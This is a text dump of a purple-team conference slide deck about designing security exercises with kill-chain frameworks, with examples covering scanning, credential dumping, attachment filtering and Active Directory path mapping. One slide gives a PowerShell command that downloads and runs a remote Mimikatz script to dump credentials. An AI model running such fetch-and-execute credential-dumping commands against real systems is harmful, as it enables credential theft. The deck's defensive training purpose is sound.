SlideShare a Scribd company logo
@haydnjohnson
How to create Purple
Team exercises with
the CKC & EKC
@haydnjohnson
Whoami
Haydn Johnson
Security Analyst | Manager | Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, HackFest, SecTor.
NolaCon
Offsec, Purple Team, Gym??
http://www.slideshare.net/HaydnJohnson
3
I work here!
@haydnjohnson
Inspiration from
@carnal0wnage - Chris Gates
@indi303 - Chris Nickerson
Relevant Videos:
Purple Teaming the Cyber Kill Chain Practical Exercises for Management
http://2016.video.sector.ca/video/188841307
BruCON 0x08 - Building A Successful Internal Adversarial Simulation Team - C.
Gates & C. Nickerson
https://www.youtube.com/watch?v=Q5Fu6AvXi_A
@haydnjohnson
1.
Outline
give a summary of (something).
@haydnjohnson
Outline
What is Purple Teaming
❏ All about
Cyber Kill Chain & Extended
❏ Lockheed Martin CKC
❏ Sean Malone EKC
❏ ATT&CK MITRE
Cyber Exercises
❏ Events / Injects
❏ Teams
❏ Phases
❏ Execution in detail
Examples of Purple Teaming
❏ NMap
❏ Mimikatz
❏ Attachment Testing
❏ Table Top
❏ BloodHound
❏ OpenDLP
@haydnjohnson
Terminology
@haydnjohnson
Terminology
Vulnerability Assessment Person - Run Vuln
Scanner....hey client you suck
Penetration Tester - Metasploit / MSF PRO (FTW)...hey
client you suck
Red Teaming - Phish, move laterally, find “sensitive stuff”,
maybe custom implant...hey client you suck
Purple Teaming - You did all the above, but got to charge
for an extra body and to tell the client how they suck in
person
@haydnjohnson
Terminology
Red Teaming - “Red Team engagements are the full
spectrum warfare of security assessments. In a red team
engagement, the consultants attack the client organization
using physical means, social engineering, and
technological avenues. “
From: http://winterspite.com/security/phrasing/
@haydnjohnson
Terminology
From: http://winterspite.com/security/phrasing/
Red Teaming
@haydnjohnson
From: Chris Nickerson Lares Consulting
@haydnjohnson
Terminology
Blue Team
❏ Network defenders
❏ Support
❏ Firewalls | Blinky Boxes
❏ Responders
@haydnjohnson
Terminology
Purple Team
❏ Working together to achieve the ultimate goal of
making the organization more secure
❏ different threats & attacker mindset
❏ incident detection and response
❏ policy and procedures
❏ tuning of controls
@haydnjohnson
@haydnjohnson
2.
Purple Team
Process
what | how
@haydnjohnson
Purple Team
❏ Conducting focused pentesting (up to Red
Teaming) with clear training objectives for the
Blue Team.
❏ It isn't a "can you get access to X" exercise it is
a "train the Blue Team on X" exercise. The
pentesting activities are a means to conduct
realistic training.
@haydnjohnson
Purple Team
❏ Togetherness
AttackDefend
@haydnjohnson
3.
The CKC & ECKC
Cyber Kill Chain
Expanded Cyber Kill Chain
@haydnjohnson
The Cyber Kill
Chain
Lockheed Martin
http://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html
@haydnjohnson
Cyber Kill Chain
❏ Worst Name Ever
❏ “The seven steps of the Lockheed Martin Cyber
Kill Chain® enhance visibility into an attack
and enrich an analyst’s understanding of an
adversary’s tactics, techniques and
procedures.”
http://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html
@haydnjohnson
Cyber Kill Chain
@haydnjohnson
Cyber Kill Chain
❏ The Idea is great
❏ This is an integrated, end-to-end process
described as a “chain” because any one
deficiency will interrupt the entire process.
❏ AKA:
Any deficiency in the attackers chain, will
interrupt the entire process
@haydnjohnson
Cyber Kill Chain
https://countuponsecurity.com/tag/kill-chain/
@haydnjohnson
Cyber Kill Chain
Road Map
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Pape
r-Intel-Driven-Defense.pdf
@haydnjohnson
The Expanded
Cyber Kill Chain
Sean Malone
https://www.blackhat.com/docs/us-16/materials/us-16-Malone-Using-An-Expanded-Cyber-Kill-Chai
n-Model-To-Increase-Attack-Resiliency.pdf
@haydnjohnson
Expanded Cyber Kill Chain
❏ AKA - The Internal Kill Chain
❏ Original CKC focuses primarily on before an
attack gains access
❏ ECKC builds out the methodology once an
attacker is in the network
@haydnjohnson
Expanded Cyber Kill Chain
http://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html
External Cyber Kill
Chain
Internal Kill Chain
Target Manipulation Kill
Chain
@haydnjohnson
From:
https://www.blackhat.com/docs/us-16/materials/us-16-Malone-Using-An-Expanded-Cyber-Kill-Cha
in-Model-To-Increase-Attack-Resiliency.pdf
@haydnjohnson
ATT&CK
Another framework!
@MITREattack
@haydnjohnson
ATT&CK Framework
a threat modeling methodology and suite of models
for the various phases of an adversary's lifecycle and
platforms that are known to be targeted by cyber
threats
The MITRE ATT&CK Matrix™ is a visualization of the
tactics and techniques.
@haydnjohnson
ATT&CK Framework
Looks like:
@haydnjohnson
ATT&CK Framework
Looks like:
@haydnjohnson
ATT&CK Framework
Great video that explains it in practice:
Hackfest 2016 - Chris Nickerson :
Adversarial Simulation: Why your defenders are the
Fighter Pilots.
https://www.youtube.com/watch?v=flmxbKfIAE4
@haydnjohnson
ATT&CK Framework
Attempting to implement
@haydnjohnson
4.
Cyber Exercises
MITRE cyber exercise playbook
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf
@haydnjohnson
@haydnjohnson
Events / Injects
Events - generally executed by the Red Team to elicit
responses from the Blue Team in specific phases,
focused on the objectives of the exercise.
@haydnjohnson
Different Teams
within cyber exercises
@haydnjohnson
Exercises - Teams
ECG GREY
RED BLUE
@haydnjohnson
Exercises - Teams
Exercise Control Group
Take information from other teams and make
decision to ensure the exercise is “controlled” and
reaches its goals.
IR Manager
Team Lead
VP
ECG
@haydnjohnson
Exercises - Teams
Gray Team / Observers
Observe the Blue Team's reaction or non-reaction and
report back to ECG.
Ongoing process
IR Manager
Team Lead
VP
GREY
@haydnjohnson
Exercises - Teams
@haydnjohnson
Phases
of cyber exercises
@haydnjohnson
Phases of a Cyber Exercise
❏ Plan
❏ Execution
❏ Lessons Learned
@haydnjohnson
Exercises - Planning
Preliminary
Meeting
Middle
Meetings
Final
Meeting
@haydnjohnson
Exercises - Planning
“By failing to prepare, you are preparing to fail.”
Benjamin Franklin
Everything needs consideration, pros, cons and a
plan!
1. Brainstorming
2. Action Items
3. Budget / Approval
@haydnjohnson
Exercises - Planning
Each team needs to know the end goals (except Blue)
Red Team needs to know what injects and when.
Goals:
1. To prevent confusion
2. Finalize Objectives
3. Identify if training is required
4. Decide on Use Cases
@haydnjohnson
Exercises - Ideas
Initial Weakness
New technology
New Team
Test assumption
Budget
Devils advocate
@haydnjohnson
Exercises - Ideas
https://github.com/aptnotes/data/blob/master/APTnotes.csv
@haydnjohnson
Exercises - Execution
❏ Execution
❏ Go Time
❏ Observe, Change, Observe
Be Dynamic
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
RT tasked with
action
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
RT tasked with
action
Execute inject /
event
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
Collects
information
RT tasked with
action
Execute inject /
event
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
4
Collects
information
Feedback to ECG
RT tasked with
action
Execute inject /
event
@haydnjohnson
Exercises - Execution
What if no response?
No Alerts?
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check for
hackers.fu
@haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check alert for
mal.exe
@haydnjohnson
Exercises - Lessons Learned
❏ What observations were made during the
exercise.
What went well, what didn’t
Positive and negative - constructive
@haydnjohnson
Exercises - Lessons Learned
❏ Internally we need to prepare better
❏ Ensure findings are document
❏ Think of more alternative tests
@haydnjohnson
Exercises - Lessons Learned
Exercise
Good
Bad
Improvements Follow-up
@haydnjohnson
Exercises - Lessons Learned
Collect Information from everyone
Strengthen future exercises
Exercise
Control
Group
Red
Team
Training
Audience
Observers
@haydnjohnson
5.
Example exercises
Using CKC & EKC
@haydnjohnson
Nmap
Mimikatz
Malicious Attachment Testing
BloodHound
Tabletop Exercise
OpenDLP
@haydnjohnson
Port Scanning Detection
Nmap
Internal Kill Chain
External Cyber Kill
Chain OR
@haydnjohnson
Example 1 - Nmap
# of People Required: 1
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None
@haydnjohnson
Example 1 - Nmap
Test if Nmap / Port scans can be seen internally or
externally
What do the alerts look like?
@haydnjohnson
Example 1 - Nmap
Start Basic
Increase complexity
Fragmentation
@haydnjohnson
Example 1 - Nmap
$END POINT SOLUTION catches Nmap
$EPS misses fragmentation / slow scans
Each workstation gives ALERT
Try with Avast, McAfee, Symantec etc
@haydnjohnson
Example 1 - Nmap
https://nmap.org/book/man-bypass-firewalls-ids.html
@haydnjohnson
Example 1 - Nmap
Why Nmap? APT won’t use Nmap
❏ It is a start
❏ Simple & cheap
❏ Test current technology
@haydnjohnson
Example 1 - PowerShell
Advancing the exercise
@haydnjohnson
PowerShell Remoting
Mimikatz
@haydnjohnson
Example 2- Credentials in Memory
# of People Required: 1 -2
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None
@haydnjohnson
Example 2- Credentials in Memory
Helpdesk / Ops wants a secure way to remotely
manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and
‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/
@haydnjohnson
Example 2- Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditbility
Research shows this is possible
@haydnjohnson
Example 2- Credentials in Memory
Steps:
○ Before PS-Remoting ○ After PS-Remoting
@haydnjohnson
Example 2- Credentials in Memory
❏ Need to know for sure
❏ Want to test credentials are safe
❏ See for self
Mimikatz comes in
@haydnjohnson
Example 2- Credentials in Memory
Command Run:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds | Out-File pre.txt”
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa
sswords-with.html
@haydnjohnson
Example 2- Credentials in Memory
Dumping credentials
@haydnjohnson
Example 2- Credentials in Memory
PS-Remote
@haydnjohnson
Example 2- Credentials in Memory
Compare
@haydnjohnson
Example 2 - Credentials in
Memory
Thumbs up success gift] / image
@haydnjohnson
Example 2- Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!
@haydnjohnson
email filter
Malicious
Attachment
Testing
External Cyber Kill
Chain
@haydnjohnson
Example 3 - Malicious Attachment
Testing
<Email> is great at filtering malicious emails,
attachments etc.
We want to see what gets through to know what to
expect
“What could get through”
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Malicious File Maker
@carnal0wnage
https://github.com/carnal0wnage/malicious_file_make
r
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Automates sending
@haydnjohnson
Example 3 - Malicious Attachment
Testing
AV Pop-Ups
@haydnjohnson
Example 3 - Malicious Attachment
Testing
@haydnjohnson
Example 3 - Malicious Attachment
Testing
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Not script kiddie friendly
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Some attachments you cannot send
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Receiving file attachments
@haydnjohnson
Example 3 - Malicious Attachment
Testing
The goal:
❏ Confirm email attachment filtering
❏ Confirm attachments that bypass
❏ Document findings for reference
❏ Potential defenses / future steps
@haydnjohnson
Example 3 - Malicious Attachment
Testing
Which allows us:
❏ Potential tuning to block file types
❏ Research file types for use in the wild
❏ Identification of compensating controls
@haydnjohnson
BloodHound
Domain Admin
Paths
Internal Kill Chain
@haydnjohnson
Example 4 - Domain Admin Paths
# of People Required: 1 -2
Level of knowledge required: Enough to install the tool
Documentation online: Installation instructions
Time to Test Minimal
Disruption to Business Potential to pop alerts
@haydnjohnson
Example 4 - Domain Admin Paths
Goals:
❏ Identify Domain Admins
❏ Identify derivative admins
❏ Weakness in the chain of trust
@haydnjohnson
Example 4 - Domain Admin Paths
BloodHound command:
https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/
https://wald0.com/?p=112
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started
@haydnjohnson
Example 4 - Domain Admin Paths
Tested with helpdesk access
@haydnjohnson
Example 4 - Domain Admin Paths
Mystery account “SUPERHERO” identified via ACLs
@haydnjohnson
Example 4 - Domain Admin Paths
❏ Follow up on mystery account
❏ Create Ticket
❏ Does it require the access it has?
Test with a group that has less access
@haydnjohnson
Table Top Exercise
Internal Kill Chain
External Cyber Kill
Chain
Target Manipulation Kill
Chain
@haydnjohnson
Example 4 - Table Top Exercise
# of People Required: Many
Level of knowledge required: Varied
Documentation online: Yes
Time to Test Long term
Disruption to Business 1 day +
@haydnjohnson
Example 4 - Table Top Exercise
Goals:
❏ Raise awareness
❏ Practice before it happens
@haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
During
Post
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302
@haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
$Group Threaten Company
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302
@haydnjohnson
@haydnjohnson
Example 4 - Table Top Exercise
Response A
@haydnjohnson
Example 4 - Table Top Exercise
Response B
@haydnjohnson
Example 4 - Table Top Exercise
ECURITY
C - LEVEL
PR
IT
@haydnjohnson
Example 4 - Table Top Exercise
Technical Response
IR
Hardening
Public Response
Disclosure
Insurance
@haydnjohnson
Example 4 - Table Top Exercise
Do this for each stage:
❏ Pre Hack
❏ During
❏ Post Hack
@haydnjohnson
OpenDLP
Lateral Movement
Target Manipulation Kill
Chain
@haydnjohnson
Example 5 - Lateral Movement
# of People Required: 1-2
Level of knowledge required: Ability to find network shares
Documentation online: Yes
Time to Test hours
Disruption to Business Minimal
@haydnjohnson
Example 5 - Lateral Movement
Goals:
❏ Is there sensitive information at rest?
❏ What data could be accessed on network shares
@haydnjohnson
Please note
❏ Exercises do not have to be ‘offsec’ tool focused
❏ Attacker mindset is important
❏ Testing assumptions
@haydnjohnson
Example 5 - Lateral Movement
OpenDLP
❏ Data Loss prevention tool
❏ Identifies sensitive data at rest on thousands of
systema
❏ Not easy to install
https://github.com/ezarko/opendlp
@haydnjohnson
Example 5 - Lateral Movement
OpenDLP Video Reference
Bsides Cleveland 2017
Blue-Teamin' on a Budget [of Zero]
https://www.youtube.com/watch?v=77M0aO2F2fU
@haydnjohnson
Example 5 - Lateral Movement
❏ Download OVA
❏ Transfer sc.exe from XP 32bit
❏ Install browser sert
❏ Start apache
❏ connect
@haydnjohnson
Example 5 - Lateral Movement
Issues with install:
❏ sc.exe 32bit
❏ Accessing web server
❏ Solution:
XP
http://www.makeuseof.com/tag/download-wi
ndows-xp-for-free-and-legally-straight-from-
microsoft-si/
@haydnjohnson
Example 5 - Lateral Movement
Import cert
@haydnjohnson
Example 5 - Lateral Movement
Looks like this
@haydnjohnson
Example 5 - Lateral Movement
❏ PII
❏ Credit card data etc
@haydnjohnson
Example 5 - Lateral Movement
Report looks like:
@haydnjohnson
Example 5 - Lateral Movement
❏ This is still a work in progress.
❏ Wondering how I can create a process out of it
@haydnjohnson
Conclusion
@haydnjohnson
Top Takeaways
Don’t Assume
Be Proactive
Take action
129
Questions, Comments, Ask away
Thank you OWASP AUSTIN for
having me!

More Related Content

What's hot

Filip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawlerFilip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawler
Marketing Festival
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
beltface
 
Klein_Andrew_PPP_Presentation
Klein_Andrew_PPP_PresentationKlein_Andrew_PPP_Presentation
Klein_Andrew_PPP_Presentation
Andrew Klein
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Mazin Ahmed
 
The Backside of the Class (CSS Day 2015)
The Backside of the Class (CSS Day 2015)The Backside of the Class (CSS Day 2015)
The Backside of the Class (CSS Day 2015)
Stephen Hay
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Mazin Ahmed
 
SEO Hacks & Apps
SEO Hacks & AppsSEO Hacks & Apps
SEO Hacks & Apps
Tom Critchlow
 
How to get inside the search engine crawler head - Marketing Festival
How to get inside the search engine crawler head - Marketing FestivalHow to get inside the search engine crawler head - Marketing Festival
How to get inside the search engine crawler head - Marketing Festival
Filip Podstavec
 
Faster websites
Faster websitesFaster websites
Faster websites
marcoemrich
 

What's hot (9)

Filip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawlerFilip Podstavec - Get inside the head of a crawler
Filip Podstavec - Get inside the head of a crawler
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
 
Klein_Andrew_PPP_Presentation
Klein_Andrew_PPP_PresentationKlein_Andrew_PPP_Presentation
Klein_Andrew_PPP_Presentation
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
 
The Backside of the Class (CSS Day 2015)
The Backside of the Class (CSS Day 2015)The Backside of the Class (CSS Day 2015)
The Backside of the Class (CSS Day 2015)
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
 
SEO Hacks & Apps
SEO Hacks & AppsSEO Hacks & Apps
SEO Hacks & Apps
 
How to get inside the search engine crawler head - Marketing Festival
How to get inside the search engine crawler head - Marketing FestivalHow to get inside the search engine crawler head - Marketing Festival
How to get inside the search engine crawler head - Marketing Festival
 
Faster websites
Faster websitesFaster websites
Faster websites
 

Similar to PT_OWASP_AUSTIN_2017

Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
Haydn Johnson
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
Sonatype
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
Jorge Orchilles
 
How to Use Agile to Move the Earth
How to Use Agile to Move the EarthHow to Use Agile to Move the Earth
How to Use Agile to Move the Earth
Ryan Martens
 
Purple View
Purple ViewPurple View
Purple View
Haydn Johnson
 
Purple View
Purple ViewPurple View
Purple View
Haydn Johnson
 
Splunk September 2023 User Group PDX.pdf
Splunk September 2023 User Group PDX.pdfSplunk September 2023 User Group PDX.pdf
Splunk September 2023 User Group PDX.pdf
Amanda Richardson
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
Jorge Orchilles
 
Getting better
Getting betterGetting better
Getting better
Tom Janssens
 
Continuous Acceleration with a Software Supply Chain Approach
Continuous Acceleration with a Software Supply Chain ApproachContinuous Acceleration with a Software Supply Chain Approach
Continuous Acceleration with a Software Supply Chain Approach
Sonatype
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
Agile Fundamentals
Agile FundamentalsAgile Fundamentals
Agile Fundamentals
Atlassian
 
Leading A DevOps Transformation: Lessons Learned
Leading A DevOps Transformation: Lessons LearnedLeading A DevOps Transformation: Lessons Learned
Leading A DevOps Transformation: Lessons Learned
Gene Kim
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
Daniel López Jiménez
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
Jorge Orchilles
 
Spark 2016 - Jason Yip
Spark 2016 - Jason YipSpark 2016 - Jason Yip
Spark 2016 - Jason Yip
Spark Canada
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the Basics
Cybereason
 
Is data visualisation bullshit?
Is data visualisation bullshit?Is data visualisation bullshit?
Is data visualisation bullshit?
Alban Gérôme
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
Michael Gough
 

Similar to PT_OWASP_AUSTIN_2017 (20)

Purple teaming Cyber Kill Chain
Purple teaming Cyber Kill ChainPurple teaming Cyber Kill Chain
Purple teaming Cyber Kill Chain
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSecDevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
DevOps Connect: Josh Corman and Gene Kim discuss DevOpsSec
 
Purple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHatPurple Team Exercise Hands-On Workshop #GrayHat
Purple Team Exercise Hands-On Workshop #GrayHat
 
How to Use Agile to Move the Earth
How to Use Agile to Move the EarthHow to Use Agile to Move the Earth
How to Use Agile to Move the Earth
 
Purple View
Purple ViewPurple View
Purple View
 
Purple View
Purple ViewPurple View
Purple View
 
Splunk September 2023 User Group PDX.pdf
Splunk September 2023 User Group PDX.pdfSplunk September 2023 User Group PDX.pdf
Splunk September 2023 User Group PDX.pdf
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
 
Getting better
Getting betterGetting better
Getting better
 
Continuous Acceleration with a Software Supply Chain Approach
Continuous Acceleration with a Software Supply Chain ApproachContinuous Acceleration with a Software Supply Chain Approach
Continuous Acceleration with a Software Supply Chain Approach
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
Agile Fundamentals
Agile FundamentalsAgile Fundamentals
Agile Fundamentals
 
Leading A DevOps Transformation: Lessons Learned
Leading A DevOps Transformation: Lessons LearnedLeading A DevOps Transformation: Lessons Learned
Leading A DevOps Transformation: Lessons Learned
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
 
Spark 2016 - Jason Yip
Spark 2016 - Jason YipSpark 2016 - Jason Yip
Spark 2016 - Jason Yip
 
Threat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the BasicsThreat Hunting 102: Beyond the Basics
Threat Hunting 102: Beyond the Basics
 
Is data visualisation bullshit?
Is data visualisation bullshit?Is data visualisation bullshit?
Is data visualisation bullshit?
 
Finding attacks with these 6 events
Finding attacks with these 6 eventsFinding attacks with these 6 events
Finding attacks with these 6 events
 

More from Haydn Johnson

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
Haydn Johnson
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
Haydn Johnson
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
Haydn Johnson
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
Haydn Johnson
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016
Haydn Johnson
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration Testing
Haydn Johnson
 
Empire Work shop
Empire Work shopEmpire Work shop
Empire Work shop
Haydn Johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
Haydn Johnson
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
Haydn Johnson
 

More from Haydn Johnson (9)

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
 
ProsVJoes - Task 2016
ProsVJoes - Task 2016ProsVJoes - Task 2016
ProsVJoes - Task 2016
 
Automation of Penetration Testing
Automation of Penetration TestingAutomation of Penetration Testing
Automation of Penetration Testing
 
Empire Work shop
Empire Work shopEmpire Work shop
Empire Work shop
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
 

Recently uploaded

UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..UiPath Community Day Dubai: AI at Work..
UiPath Community Day Dubai: AI at Work..
UiPathCommunity
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
